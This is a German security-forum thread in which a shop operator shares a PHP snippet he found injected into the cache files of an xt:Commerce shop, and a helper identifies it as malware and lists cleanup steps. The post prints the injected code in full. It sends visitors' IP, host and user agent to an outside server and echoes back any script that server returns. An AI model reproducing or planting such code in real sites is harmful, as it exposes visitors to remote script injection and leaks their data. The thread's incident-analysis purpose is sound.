Trojaner-Board

Trojaner-Board (https://www.trojaner-board.de/)
-   Alles rund um Mac OSX & Linux (https://www.trojaner-board.de/alles-rund-um-mac-osx-linux/)
-   -   Schadsoftware auf Webserver (PHP) (https://www.trojaner-board.de/153813-schadsoftware-webserver-php.html)

ShopNix 13.05.2014 14:29

Schadsoftware auf Webserver (PHP)
 
Auf einem Webserver fand ich folgenden Schadcode:

PHP-Code:

#c18fce#
error_reporting(0); ini_set('display_errors',0); $wp_j6451 = @$_SERVER['HTTP_USER_AGENT'];
if (( 
preg_match ('/Gecko|MSIE/i'$wp_j6451) && !preg_match ('/bot/i'$wp_j6451))){
$wp_j096451="hxxp://"."template"."body".".com/body"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_j6451);
$ch curl_init(); curl_setopt ($chCURLOPT_URL,$wp_j096451);
curl_setopt ($chCURLOPT_TIMEOUT6); curl_setopt($chCURLOPT_RETURNTRANSFER1); $wp_6451j curl_exec ($ch); curl_close($ch);}
if ( 
substr($wp_6451j,1,3) === 'scr' ){ echo $wp_6451j; }
#/c18fce# 

Falls jemand eine Ahnung hat, was das ist, ob es in Zusammenhang mit anderen Schweinereien auftritt, und ob ich nun alles auf den Kopf stellen muss, wäre ich für zweckdienliche Hinweise dankbar.

Die Sache fiel auf, weil das obige Snippet mangels Empfänger nicht mehr nach Hause telefonieren konnte. Die dadurch entstehende Verzögerung führte zu Ladezeiten von 2-3 Minuten statt der üblichen 5-10 Sekunden.

Der Codeblock war mit unterschiedlichen Kommentaren in allen Smarty-Cachefiles eines xt:Commerce-Shops enthalten.

Hinweis: Ich betreibe derlei Geschichten gewerblich, habe mir die Hinweise für neue Postings durchgelesen, kann aber als reiner Linux-User die angegebenen Programme nicht betreiben und infolgedessen auch die gewünschten Logs nicht liefern.

Falls ich als Neuling hierzuforum etwas übersehen haben sollte, nehme ich auch dazu Hinweise entgegen. Danke.

Alois S 23.05.2014 13:00

Hallo ShopNix und :hallo: ,

nun, hier handelt es sich eindeutig um Schadcode! :eek:

Die Vorgangsweise in solchen Fällen dürfte ja bekannt sein:

1) Backup der vorhandenen Dateien machen zu späteren Analysezwecken

2) Löschen des gesamten Webspace und Restore einer sauberen Installation durchführen

3) Alle Kennwörter ändern

4) Rücksprache mit Provider/Hoster wegen der Infektion anderer Websites


Liebe Grüße, Alois

Post © Alois 2014 – Alle Rechte vorbehalten – kein Teil darf in irgendeiner Form ohne schriftliche Genehmigung des Autors kritisiert werden! :aufsmaul:

ShopNix 23.05.2014 13:17

Hallo Alois,

vielen Dank für den Willkommensgruß.

Die Standard-Vorgehensweise hilft mir an der Stelle leider nicht weiter, denn die eigentliche Infektion des Webspace liegt nach Angaben des Betreibers schon längere Zeit zurück. Demnach wurde der Webspace gesäubert und alles war gut.

Ich weiß leider auch nicht, was da alles installiert ist, sondern habe mich ausschließlich um die bemängelten Ladezeiten gekümmert und dabei den o. a. Schadcode entdeckt.

Was ich fand, ist wohl nur ein Überbleibsel, und ich hätte gern daraus auf die Ursache zurückgeschlossen um eventuell bekannte Zusammenhänge nachzuverfolgen.

Für den Shop ist das kein Thema, da erfolgt eine komplette Neuinstallation zum Zwecke der Migration auf aktuellen Softwarestand. Sorgen machen mir die weiteren Komponenten auf der Website, die ich nicht kenne, und für die ich keinen Auftrag habe.

Alois S 23.05.2014 13:27

Gern geschehen! :)

Zitat:

Sorgen machen mir die weiteren Komponenten auf der Website, die ich nicht kenne, und für die ich keinen Auftrag habe.
Nun, da hilft eigentlich nur eine Rück- und/oder "Aussprache" mit dem betreffenden Hoster - sorry, dass ich nicht mehr dazu sagen kann, aber eine "Eigenanalyse" ist hier weder empfehlenswert noch möglich (ist ja nicht deine Seite, oder?)

Liebe Grüße, Alois

ShopNix 23.05.2014 13:41

Der Hoster will nicht mit mir schwätzen, weil ich nicht sein Kunde bin, der Betreiber versteht anscheinend nicht, wovon ich rede und ich habe keine große Lust, mich mit Ignoranten herumzuschlagen.

Also dachte ich, ich poste das Ding mal an qualifizierter Stelle. Wenn mir jemand zweckdienliche Hinweise geben kann, dann verfolge ich die, andernfalls wasche im meine Hände in Unschuld. :heilig:

Alois S 23.05.2014 13:56

Hallo ShopNix,

nun, da der bzw. die Hacker ihren Server ja inzwischen abgeschaltet haben (wenn ich dich richtig verstanden habe) - was soll´s ? :glaskugel:

EDIT: Übrigens ist der Code recht raffiniert geschrieben - das Schadscript wird nur bei herkömmlichen Browsern und nicht bei Bots ausgeführt und an einem Block ist auch deutlich zu erkennen, dass die "Verseuchung" gelungen ist.....

Liebe Grüße, Alois


Alle Zeitangaben in WEZ +1. Es ist jetzt 18:31 Uhr.

Copyright ©2000-2024, Trojaner-Board


Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129